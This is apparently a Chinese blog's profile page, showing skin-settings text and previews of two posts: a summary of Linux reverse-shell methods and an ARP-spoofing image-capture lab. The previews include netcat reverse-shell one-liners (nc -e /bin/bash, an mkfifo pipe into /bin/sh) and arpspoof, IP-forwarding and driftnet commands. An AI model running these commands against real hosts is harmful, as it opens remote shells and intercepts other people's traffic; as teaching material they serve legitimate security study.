自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(2)
  • 收藏
  • 关注

原创 Linux反弹Shell总结

反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc

2022-01-06 23:34:05 4300 1

原创 ARP欺骗攻击抓取图片

ARP欺骗攻击抓取图片 一、实验原理 1.ifconfig查找自己的ip地址 2.nmap -sP ip地址/24 3.arpspoof -i eth0 -t 对方ip 网关地址 4.启转发数据(echo 1 > /proc/sys/net/ipv4/ip_forward) 5.driftnet 抓取图片 6.ARP协议是用来已知IP地址求MAC地址。在每台主机中都有一张ARP地址缓存表,当...

2019-09-06 20:39:59 1619

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除